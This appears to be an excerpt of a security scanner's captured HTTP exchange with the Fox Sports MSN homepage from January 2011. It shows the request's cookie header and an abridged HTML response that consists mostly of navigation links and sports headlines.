Cookie: _gig_mig=1; UnicaNIODID=I7HpnSWrYC7-Ww6qltH; pALERTED=TRUE; pEFSUID=/k94ON71KoD/EYqOMDzIDg==; pRME=; pExternalUser=; pLMD="2011-01-08 00:30:34"; pENC_EMAIL=s3nN+QCME4PqzMAvdLX63Yi++Emnqjmo; pENC_FNAME=Z1NVLTXWY1w=; pENC_LNAME=/wgeX1XilBI=; pFANTASYMOGULS=Jeypi2HA88QREMq/XrW5W6uaqRGCAMb+/M+ZzLvMJQSwaQW+febL4rpIIS10epmqgh/UVs1iVta0QPbQGbW+zEajyFiaJOKRs7miETBZyarJr1nY/ID/k8yxImY14QfLYp4Fx861z1PvhtTsTCo9nHhiJENEhksH9YgRXJ3iI3Kh8JguNeuK3N/eAzA+OMKstnepVvExJrs9ImjZI/XRI4JGRpFqkQEyAknAUiFBw280mu4h97153zkgZC3pprU0kHjSy1+3H8fa9C2mVIy0IJVI54TMoAqj8gf392S0Ozlcvob3U3YSfYf+fg80kwtJC6EWBz0qFcsMIR3IXQd90zjrRj+j6Il/bU36Pj1bI8A2Yml8HCRZs21N+j49WyPAFq4+ZdtreA4wf3lPSso/Mg==; pONESITE=wECUR3DVfAatOJ2BuE9nEIJ6iKhzw1J1DqpfIMqe8p8sMuelq5ptJXgFJkbkdTcy6v1ljz5hnRsOHtn/ORHunKGA9azvOKsjnlQl5+vANAphEHPO/TfA0gs0xGbwCkp2ZlHn80Wwjmy12/lA2yGCayQM/yxBkVKtmpMGzs5noanJHgnnsREscBsew5UDzLAY6u9XpfOLODoWeR/uovPQww==; pWHATIFSPORTS=0457nhtCFA3t1jis7tppnQYRYQCN6bXOVFUsoFcZ9DFjABAPjYGpxDMI976pCTsSgbHPbKqUUcAnnVgwH4WLWIw22dkifhqeveh7yGKiUBlCUggy9jwYGLPwO4g2/2TaHI5aWd5N/U6TrAz4oiqCRNr9VH15cFkq7VpqEGMPu4ZQoCd8JiazfhiCz19aE8Rr96avqbADey4zfxh7OCe3ARE45iIC+SoOO4zwo+2imw1wriyE/gxP7lCgJ3wmJrN+KsXLdMDxGLAaQBnEGrlvs9ds+BKO8cGA+0bSRs6mbTfXoJRF4HgeglEUizR3jzAIsqs4dxIjPEOir71y3OLemXi49kGaq/9vS2x2YKiW+hc=; pOPENSPORTS=KpKIL1M1Ag7Mu56rLIpMyH5Q0qTa5gwvuojCbFPQ5dB7rEdoiBUsOZlngCkKK0BShV4DtJ2fNgytwuhWqePhap9UWmxXoUrCerKsn/KNhssOwxf4JASIw7xwKkdd2uRnrbDV+1X03Zn6t+4KfItlF+qMzS6uOiVeU6ksPSqGW24b8A0Qgsz0zHhcvIriUhBbXXZQZk+4OsNItgO/YFsefQ0ZpEPEFd4z/5NzIdmRx4jPjxBJhyGQVqVwnQrzIpurXvOhNehzUUSKsb6SUNh4BjCSV5eyYXhZ; pSTATS=oKMikaeXnadVXvheCgqv4qQGkvW5KkX7zWw6zIUiOwvlI5/OUGVvoWTXFJpBNWzQWVqOGmQZlvBCESj72haC4/OzY40LwV+YVr8L9ReeU4T3lYhQ6KEyPw/L10QuMbosYM5aXgrRZt1Yuvg4rb1Hi9aLTkInIxcA; p11Kicks=7hfkkH5SN2ZnN488gKPP/GoXgOjDHl8RHLhCy3k7srsMr93kN8jrjbj3JgOI//CNZNiPHqQknRCMrKkIfl/N5YzzG16dog5fbW9kcCerWKOn5ROJwytkLTvZ4ryWzh+op2eMu5KhEdM/Jtq0Zg+GjMvR2anBaMaD; pUID=/k94ON71KoD/EYqOMDzIDg==; glt_2_0mDflAmB2Uw-8uIvNcQDq7cV0-R4xz_-VK9rOU18T-Jc_50uceVqQUddE55Vkw25=LT1_wYGVkkgCTuOFWv1NpFDEqA%3D%3D; MUID=65AFF4B77A124856A6B4337A160FA285; _chartbeat2=oxy92bi233plhtq3; NetInsightSessionID=1
Proxy-Connection: Keep-Alive
Host: msn.foxsports.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Vary: Accept-Encoding
Cache-Control: max-age=27
Date: Sat, 08 Jan 2011 00:41:44 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 296321


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>


            <script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
...[SNIP]...
</script>-->
<script type="text/javascript" language="javascript" src="http://img.widgets.video.s-msn.com/js/embed.js"></script>
<script type="text/javascript" language="javascript" src="http://images.video.msn.com/js/vp.js"></script>
...[SNIP]...
<li>
<a href="http://www.speed.com/" title="Speed" class="speed" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Speed'});" target="_blank">SPEED</a>
...[SNIP]...
<li>
<a href="http://www.scout.com/" title="Scout" class="scout" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Scout'});" target="_blank">SCOUT</a>
...[SNIP]...
<li>
<a href="http://www.foxdeportes.com/" title="Deportes" class="deportes" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Deportes'});" target="_blank">DEPORTES</a>
...[SNIP]...
<li>
<a href="http://www.whatifsports.com" title="What If" class="what-if" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - What If'});" target="_blank">WHAT IF</a>
...[SNIP]...
<li>
<a href="http://fsr-pr.clearchannel.com" title="FOX Sports Radio" class="radio" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Fox Sports Radio'});" target="_blank">RADIO</a>
...[SNIP]...
<li>
<a href="http://foxsports.seenon.com/?ecid=PRF-SM-500003&PA=FoxSportNav " title="Shop" class="shop" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Shop'});" target="_blank">SHOP</a>
...[SNIP]...
<li><a href="http://www.bing.com/search" id="wslink">Search the Web</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=foxsports-nfl" target="_blank" title="Shop">Shop</a>
...[SNIP]...
class="">


                                                        <a href="http://www.baseballamerica.com" target="_blank" title="Baseball America">Baseball America</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_mlb" target="_blank" title="Shop">Shop</a>
...[SNIP]...
class="">


                                                        <a href="http://www.speedtv.com" target="_blank" title="SPEED">SPEED</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_nascar" target="_blank" title="Shop">Shop</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_nba" target="_blank" title="Shop">Shop</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_nhl" target="_blank" title="Shop">Shop</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_ncaa" target="_blank" title="Shop">Shop</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_ncaa" target="_blank" title="Shop">Shop</a>
...[SNIP]...
<li class="">

   
                                    <a href="http://foxsoccer.tv" title="FoxSoccer.tv">FoxSoccer.tv</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.golfweek.com" target="_blank" title="Golfweek">Golfweek</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://insidefights.com/" target="_blank" title="Inside Fights">Inside Fights</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.heavy.com/mma/ " target="_blank" title="HeavyMMA">HeavyMMA</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.thefightnetwork.com" target="_blank" title="Fight Network">Fight Network</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.redbullairrace.com/cs/Satellite/en_air/Official-Red-Bull-Air-Race-Homepage/001238611393596" target="_blank" title="Air Racing">Air Racing</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://insidefights.com/" target="_blank" title="Inside Fights">Inside Fights</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.heavy.com/mma/ " target="_blank" title="HeavyMMA">HeavyMMA</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.thefightnetwork.com" target="_blank" title="Fight Network">Fight Network</a>
...[SNIP]...
p-down-off">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.speedtv.com" target="_blank" title="SPEED">SPEED</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.speedtv.com" target="_blank" title="SPEED">SPEED</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.tvg.com/special/FoxSportsJumpPage_final.htm" target="_blank" title="Odds/Results">Odds/Results</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.tvg.com/special/FoxSportsJumpPage_final.htm" target="_blank" title="TVG">TVG</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.racereplays.com/foxsports/index.cfm?start=ws_foxsports.com_navbar" target="_blank" title="Race Replays">Race Replays</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.redbullairrace.com/cs/Satellite/en_air/Official-Red-Bull-Air-Race-Homepage/001238611393596" target="_blank" title="Air Race Series">Air Race Series</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportswest.com/" target="_blank" title="Anaheim ">Anaheim </a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportswest.com/" target="_blank" title="Los Angeles">Los Angeles</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportssouth.com/" target="_blank" title="Atlanta">Atlanta</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportstennessee.com/" target="_blank" title="Memphis">Memphis</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.nesn.com/" target="_blank" title="Boston">Boston</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsflorida.com/" target="_blank" title="Miami">Miami</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportscarolinas.com/" target="_blank" title="Charlotte">Charlotte</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportswisconsin.com/" target="_blank" title="Milwaukee">Milwaukee</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsohio.com/" target="_blank" title="Cincinnati">Cincinnati</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsnorth.com/" target="_blank" title="Minneapolis">Minneapolis</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsohio.com/" target="_blank" title="Cleveland">Cleveland</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportstennessee.com/" target="_blank" title="Nashville">Nashville</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsohio.com/" target="_blank" title="Columbus">Columbus</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportssouthwest.com/" target="_blank" title="Oklahoma City">Oklahoma City</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportssouthwest.com/" target="_blank" title="Dallas">Dallas</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsflorida.com/" target="_blank" title="Orlando">Orlando</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsdetroit.com/" target="_blank" title="Detroit">Detroit</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsarizona.com/" target="_blank" title="Phoenix">Phoenix</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportswisconsin.com/" target="_blank" title="Green Bay">Green Bay</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportscarolinas.com/" target="_blank" title="Raleigh">Raleigh</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportshouston.com/" target="_blank" title="Houston">Houston</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportssouthwest.com/" target="_blank" title="San Antonio">San Antonio</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsmidwest.com/" target="_blank" title="Indianapolis">Indianapolis</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsmidwest.com/" target="_blank" title="St. Louis">St. Louis</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportskansascity.com/" target="_blank" title="Kansas City">Kansas City</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsflorida.com/" target="_blank" title="Tampa">Tampa</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.yardbarker.com/rumors" target="_blank" title="Rumors">Rumors</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.redbullairrace.com/cs/Satellite/en_air/Official-Red-Bull-Air-Race-Homepage/001238611393596" target="_blank" title="Air Racing">Air Racing</a>
...[SNIP]...
<li class="">


                                                           <a href="http://foxsports.seenon.com/?ecid=PRF-SM-500012&amp;PA=FoxSportNav2" target="_blank" title="Shop">Shop</a>
...[SNIP]...
<li class="msn-logo"><a href="http://msn.com" class="out-link msn sprite" title="go to MSN.com"><span>
...[SNIP]...
<li>
               <a href="http://entertainment.msn.com/" class="out-link" title="Entertainment">Entertainment</a>
...[SNIP]...
<li class="first" title="eEntertainment"><a href="http://wonderwall.msn.com/" title="Celebrities">Celebrities</a>
...[SNIP]...
<li class="" title="eEntertainment"><a href="http://thebubble.msn.com/ " title="Comedy">Comedy</a></li>
<li class="" title="eEntertainment"><a href="http://entertainment.msn.com/news/?ipp=15" title="Entertainment News ">Entertainment News </a>
...[SNIP]...
<li class="" title="eEntertainment"><a href="http://zone.msn.com/en-us/home" title="Games">Games</a></li>
<li class="" title="eEntertainment"><a href="http://movies.msn.com/" title="Movies">Movies</a></li>
<li class="" title="eEntertainment"><a href="http://music.msn.com/" title="Music">Music</a></li>
<li class="" title="eEntertainment"><a href="http://movies.msn.com/new-on-dvd/movies/" title="New on DVD">New on DVD</a>
...[SNIP]...
<li class="" title="eEntertainment"><a href="http://tv.msn.com/" title=" TV"> TV</a></li>
<li class="last" title="eEntertainment"><a href="http://entertainment.msn.com/video/?from=en-us_msnhp" title=" Video"> Video</a>
...[SNIP]...
<li>
   <a href="http://moneycentral.msn.com/home.asp" class="out-link" title="Money">Money</a>
...[SNIP]...
<li class="first" title="money"><a href="http://autos.msn.com/" title="Autos">Autos</a></li>
<li class="" title="money"><a href="http://www.msnbc.msn.com/id/3032072/ns/business" title="Business News">Business News</a>
...[SNIP]...
<li class="" title="money"><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home" title="Careers &amp; Jobs">Careers & Jobs</a>
...[SNIP]...
<li class="" title="money"><a href="http://moneycentral.msn.com/investor/home.aspx" title="Investing">Investing</a></li>
<li class="" title="money"><a href="http://moneycentral.msn.com/personal-finance/" title="Personal Finance">Personal Finance</a>
...[SNIP]...
<li class="" title="money"><a href="http://moneycentral.msn.com/detail/stock_quote" title="Quotes">Quotes</a></li>
<li class="" title="money"><a href="http://realestate.msn.com/" title="Real Estate &amp; Rentals">Real Estate & Rentals</a>
...[SNIP]...
<li class="last" title="money"><a href="http://articles.moneycentral.msn.com/video/default.aspx?from=en-us_msnhp" title="Video">Video</a>
...[SNIP]...
<li>
   <a href="http://lifestyle.msn.com/default.aspx" class="out-link" title="Lifestyle">Lifestyle</a>
...[SNIP]...
<li class="first" title="lifestyle"><a href="http://lifestyle.msn.com/your-look/" title="Beauty &amp; Fashion">Beauty & Fashion</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://www.delish.com/" title=" Cooking"> Cooking</a></li>
<li class="" title="lifestyle"><a href="http://lifestyle.msn.com/your-home/" title="Decor &amp; Organizing">Decor & Organizing</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://fitbie.msn.com" title="Fitbie">Fitbie</a></li>
<li class="" title="lifestyle"><a href="http://glo.msn.com/" title="Glo: For Her">Glo: For Her</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://health.msn.com/" title="Health">Health</a></li>
<li class="" title="lifestyle"><a href="http://astrocenter.astrology.msn.com/msn/DeptHoroscope.aspx?When=0&Af=-1000&VS" title="Horoscopes">Horoscopes</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://lifestyle.msn.com/relationships/" title="Love &amp; Relationships">Love & Relationships</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&BannerID=670269" title="Online Dating">Online Dating</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV " title=" Travel"> Travel</a></li>
<li class="last" title="lifestyle"><a href="http://lifestyle.msn.com/your-look/video/?from=en-us_msnhp" title="Video">Video</a>
...[SNIP]...
<li id="msn-more">
   <a href="http://specials.msn.com/alphabet.aspx " class="msn-more" title="More">More</a>
...[SNIP]...
<li class="first" title="more"><a href="http://autos.msn.com/" title="Autos">Autos</a></li>
<li class="" title="more"><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV" title="Maps &amp; Directions">Maps & Directions</a>
...[SNIP]...
<li class="" title="more"><a href="http://www.bing.com/videos/browse?from=en-us_msnhp" title="Video">Video</a></li>
<li class="" title="more"><a href="http://careers.msn.com/" title="Careers &amp; Jobs">Careers & Jobs</a>
...[SNIP]...
<li class="" title="more"><a href="http://my.msn.com/" title="My MSN">My MSN</a></li>
<li class="" title="more"><a href="http://local.msn.com/weather.aspx" title="Weather">Weather</a></li>
<li class="" title="more"><a href="http://insidemsn.wordpress.com" title="Corrections &amp; Clarifications">Corrections & Clarifications</a>
...[SNIP]...
<li class="" title="more"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&BannerID=670268" title="Personals">Personals</a></li>
<li class="" title="more"><a href="http://msn.whitepages.com/" title="White Pages">White Pages</a>
...[SNIP]...
<li class="" title="more"><a href="http://www.delish.com/" title="Delish">Delish</a></li>
<li class="" title="more"><a href="http://moneycentral.msn.com/detail/stock_quote" title="Quotes">Quotes</a></li>
<li class="" title="more"><a href="http://wonderwall.msn.com/" title="Wonderwall">Wonderwall</a>
...[SNIP]...
<li class="" title="more"><a href="http://games.msn.com/" title="Games Preview">Games Preview</a>
...[SNIP]...
<li class="" title="more"><a href="http://realestate.msn.com/" title="Real Estate/Rentals">Real Estate/Rentals</a>
...[SNIP]...
<li class="" title="more"><a href="http://yellowpages.msn.com/" title="Yellow Pages">Yellow Pages</a>
...[SNIP]...
<li class="" title="more"><a href="http://astrocenter.astrology.msn.com" title="Horoscopes">Horoscopes</a>
...[SNIP]...
<li class="" title="more"><a href="http://www.bing.com/shopping?FORM=SHOPH2" title="Shopping">Shopping</a></li>
<li class="" title="more"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB" title="Feedback">Feedback</a></li>
<li class="" title="more"><a href="http://local.msn.com/news.aspx" title="Local Edition">Local Edition</a>
...[SNIP]...
<li class="" title="more"><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV " title="Travel">Travel</a></li>
<li class="last" title="more"><a href="http://specials.msn.com/alphabet.aspx" title="Full MSN Index">Full MSN Index</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?FORM=FOXSP" class="bing-link">Bing</a>
...[SNIP]...
<h3><a href="http://www.foxsportsbracket.com/" title="VOTE: TOP MOMENT" >VOTE: TOP MOMENT</a>
...[SNIP]...
<span class="piped">|


<a href="http://www.foxsportswisconsin.com/01/07/11/NFL-bound/landing.html?blockID=387085&amp;feedID=5059" title="RB Clay, too">
RB Clay, too
</a>
...[SNIP]...
</span>
   

    <a href="http://www.foxsportswisconsin.com/01/07/11/NFL-bound/landing.html?blockID=387085&amp;feedID=5059" title="RB Clay, too"></a>
...[SNIP]...



    <a href="http://www.foxsportscarolinas.com/01/06/11/Carolinas-Outta-Luck/landing.html?blockID=386443&amp;feedID=3894" title="Turns out Panthers have no Luck at all">Turns out Panthers have no Luck at all</a>
...[SNIP]...



            <a href="http://www.foxsportscarolinas.com/01/06/11/Carolinas-Outta-Luck/landing.html?blockID=386443&amp;feedID=3894" title="Turns out Panthers have no Luck at all"></a>
...[SNIP]...



    <a href="http://www.foxsportsohio.com/01/07/11/Reports-Terrelle-Pryor-to-have-surgery-o/landing.html?blockID=386902&amp;feedID=3724" title="QB Pryor has surgery on foot">QB Pryor has surgery on foot</a>
...[SNIP]...



            <a href="http://www.foxsportsohio.com/01/07/11/Reports-Terrelle-Pryor-to-have-surgery-o/landing.html?blockID=386902&amp;feedID=3724" title="QB Pryor has surgery on foot"></a>
...[SNIP]...
<span class="piped">|


<a href="http://www.foxsportssouthwest.com/01/06/11/TCU-fires-back-at-Buckeyes-with-billboar/landing.html?blockID=386399&amp;feedID=4519" title="TCU billboard takes shot at OSU">
TCU billboard takes shot at OSU
</a>
...[SNIP]...
</span>
   

    <a href="http://www.foxsportssouthwest.com/01/06/11/TCU-fires-back-at-Buckeyes-with-billboar/landing.html?blockID=386399&amp;feedID=4519" title="TCU billboard takes shot at OSU"></a>
...[SNIP]...
<span class="piped">|


<a href="http://www.foxsportssouthwest.com/01/05/11/The-case-for-and-against-Jason-Garrett/landing_cowboys.html?blockID=385478&amp;feedID=4679" title="Good hire?">
Good hire?
</a>
...[SNIP]...
</span>
   

    <a href="http://www.foxsportssouthwest.com/01/05/11/The-case-for-and-against-Jason-Garrett/landing_cowboys.html?blockID=385478&amp;feedID=4679" title="Good hire?"></a>
...[SNIP]...
<div class="subhead Rumors"><a href="http://www.yardbarker.com"><img src="/component/photo/BroughtToYouByYardbarker">
...[SNIP]...
<h3><a title="Can Elway return Denver to the glory days?" href="http://network.yardbarker.com/nfl/article_external/can_john_elway_return_denver_to_their_days_of_glory/3926452">Can Elway return Denver to the glory days?</a>
...[SNIP]...
<h3><a title="Report: Weis, Haley often screamed at each other" href="http://network.yardbarker.com/nfl/article_external/report_egotistical_charlie_weis_and_todd_haley_often_screamed_at_each_other/3925793">Report: Weis, Haley often screamed at each other</a>
...[SNIP]...
<h3><a title="Amare Stoudemire to cameo in final Entourage season" href="http://network.yardbarker.com/nba/article_external/amare_stoudemire_to_appear_in_final_entourage_season/3924657">Amare Stoudemire to cameo in final Entourage season</a>
...[SNIP]...
<div class="foot"><a title="MORE RUMORS" class="more" href="http://www.yardbarker.com/rumors">MORE RUMORS&nbsp;&raquo;</a>
...[SNIP]...
<td class="fs-promo-card-image" width="65">
                   <a href="http://www.whatifsports.com/x.asp?r=678106&u=gd"><img alt="Gridiron Dynasty" border="0" src="/component/photo/Gridiron_Dynasty_65x48" />
...[SNIP]...
<strong><a href="http://www.whatifsports.com/x.asp?r=678106&u=gd">Gridiron Dynasty</a>
...[SNIP]...
<div>
                           <a href="http://www.whatifsports.com/x.asp?r=678106&u=gd" target="_blank">PLAY NOW</a>
...[SNIP]...
<div class="body">
<a title="A year of turbulence in air travel" class="main-story" href="http://www.bing.com/travel/content/search?q=The+Middle+Seat%3a+A+Year+of+Turbulence+in+Air+Travel&cid=msn1174923&form=TRVCON&ocid=xnetr4-1"><img alt="A Transportation Security Administration officer pats down Elliott Erwitt as he works his way through security at San Francisco International Airport in San Francisco, c. Jeff Chiu - AP" border="0" height="90" width="90" src="http://blstb.msn.com/i/AD/F29127CDF33B4F7F0435CFFA510E7.jpg"><span class="copy">
...[SNIP]...
<li>
<a title="Elizabeth Edwards' will" href="http://specials.msn.com/A-List/Lifestyle/Nothing-for-John-Edwards.aspx?cp-documentid=27145166&ocid=xnetr4-2">Elizabeth Edwards' will</a>
...[SNIP]...
<li>
<a title="'Lost' numbers lucky in Mega Millions" href="http://www.bing.com/search?q=%22lost%22+numbers+mega+millions+lottery&form=msnhpm&ocid=xnetr4-3">'Lost' numbers lucky in Mega Millions</a>
...[SNIP]...
<li>
<a title="Video: Top 5 must-sees at CES" href="http://www.bing.com/videos/watch/video/top-5-at-ces/q9v2d33x?q=Consumer+Electronics+Show&rel=msn&from=en-us_msnhp&form=msnrll&gt1=42007&ocid=xnetr4-4">Video: Top 5 must-sees at CES</a>
...[SNIP]...
<h4 class="story-data" title="Bill Reiter">
                   
                       <a href="http://www.foxsportsflorida.com/01/06/11/LeBron-at-his-best-on-the-road-this-seas/landing_reiter.html?blockID=386478&amp;feedID=7926" title="Road warrior">
                           <img src="http://static.foxsports.com/content/fscom/img/2011/01/06/010611-Road-Warrior-SW-PI_20110106211141407_196_100.JPG" class="story-image" width="196" height="100" alt="LeBron James (Phot
...[SNIP]...
</a>
                       <a href="http://www.foxsportsflorida.com/01/06/11/LeBron-at-his-best-on-the-road-this-seas/landing_reiter.html?blockID=386478&amp;feedID=7926" title="Road warrior">
                           <strong>
...[SNIP]...
</a>

                       <a href="http://www.foxsportsflorida.com/01/06/11/LeBron-at-his-best-on-the-road-this-seas/landing_reiter.html?blockID=386478&amp;feedID=7926" class="story-blurb" title="Road warrior">
                           LeBron has been especially lethal away from Miami.

                       </a>
...[SNIP]...
<br />
                       <a class="story-link" href="http://www.foxsportsflorida.com/01/06/11/LeBron-at-his-best-on-the-road-this-seas/landing_reiter.html?blockID=386478&amp;feedID=7926" title="FULL STORY">
                    FULL STORY&nbsp;&raquo;
                       </a>
...[SNIP]...
<h4 class="story-data" title="FOX SPORTS SOUTHWEST">
                   
                       <a href="http://www.foxsportssouthwest.com/01/05/11/Saints-offense-not-where-it-was-a-year-a/landing_saints.html?blockID=385785&amp;feedID=7065" title="Gas leak">
                           <img src="http://static.foxsports.com/content/fscom/img/2011/01/06/gasleak-pi_20110106172942297_196_100.JPG" class="story-image" width="196" height="100" alt="Drew Brees, New Orleans Saints" t
...[SNIP]...
</a>
                       <a href="http://www.foxsportssouthwest.com/01/05/11/Saints-offense-not-where-it-was-a-year-a/landing_saints.html?blockID=385785&amp;feedID=7065" title="Gas leak">
                           <strong>
...[SNIP]...
</a>

                       <a href="http://www.foxsportssouthwest.com/01/05/11/Saints-offense-not-where-it-was-a-year-a/landing_saints.html?blockID=385785&amp;feedID=7065" class="story-blurb" title="Gas leak">
                           Saints' high-octane aerial assault doesn't resemble last season's
juggernaut.

                       </a>
...[SNIP]...
<br />
                       <a class="story-link" href="http://www.foxsportssouthwest.com/01/05/11/Saints-offense-not-where-it-was-a-year-a/landing_saints.html?blockID=385785&amp;feedID=7065" title="FULL STORY">
                    FULL STORY&nbsp;&raquo;
                       </a>
...[SNIP]...
</div>


<a href="http://g.msn.com/AIPRIV/en-us" target="_blank" style="float: right;*margin-bottom: 5px;" id="adChoices"><img src="http://blstc.msn.com/br/chan/css/decoration/adchoicesv4.png"/></a>
...[SNIP]...
<a href='http://msn.foxsports.com/video/shows/inside-call?vid=b9deb230-39e9-4479-b7a4-fa4309888336&amp;from=foxsports/home/home_gallery'><img src="http://img5.catalog.video.msn.com/image.aspx?uuid=b9deb230-39e9-4479-b7a4-fa4309888336&amp;w=136&amp;h=102" height="69" width="92" /></a>
...[SNIP]...
<a href='http://msn.foxsports.com/video?vid=11488b72-869b-4def-9ea2-d302aaaf2581&amp;from=foxsports/home/home_gallery'><img src="http://img5.catalog.video.msn.com/image.aspx?uuid=11488b72-869b-4def-9ea2-d302aaaf2581&amp;w=136&amp;h=102" height="69" width="92" /></a>
...[SNIP]...
<a href='http://msn.foxsports.com/video?vid=1e97202c-76bd-4bc7-935c-5ad5ba9cae5a&amp;from=foxsports/home/home_gallery'><img src="http://img5.catalog.video.msn.com/image.aspx?uuid=1e97202c-76bd-4bc7-935c-5ad5ba9cae5a&amp;w=136&amp;h=102" height="69" width="92" /></a>
...[SNIP]...
<a href='http://msn.foxsports.com/other/page/fox-flash?vid=8dc5fe25-84b5-4135-980a-7636efe6330e&amp;from=foxsports/home/home_gallery'><img src="http://img5.catalog.video.msn.com/image.aspx?uuid=8dc5fe25-84b5-4135-980a-7636efe6330e&amp;w=136&amp;h=102" height="69" width="92" /></a>
...[SNIP]...
<a href='http://msn.foxsports.com/video?vid=3aebb01e-8cbe-45fd-9ef9-9662874330aa&amp;from=foxsports/home/home_gallery'><img src="http://img5.catalog.video.msn.com/image.aspx?uuid=3aebb01e-8cbe-45fd-9ef9-9662874330aa&amp;w=136&amp;h=102" height="69" width="92" /></a>
...[SNIP]...
<div id="http://static.foxsports.com/content/fscom/img/2010/09/21/foxsports_300x100_NFLSidelines_20100921191918_0_0.JPG">
   
       
                   <a href="http://foxsports.seenon.com/?v=fox-sports_nfl&amp;ecid=PRF-SM-510004&amp;PA=FOXNFLSideline_300X100"><img src="http://static.foxsports.com/content/fscom/img/2010/09/21/foxsports_300x100_NFLSidelines_20100921191918_0_0.JPG" alt="" border="0" />
...[SNIP]...
<div id="http://static.foxsports.com/content/fscom/img/2011/01/07/nfl_Playoffs_300x100_B_20110107192147867_0_0.JPG">
   
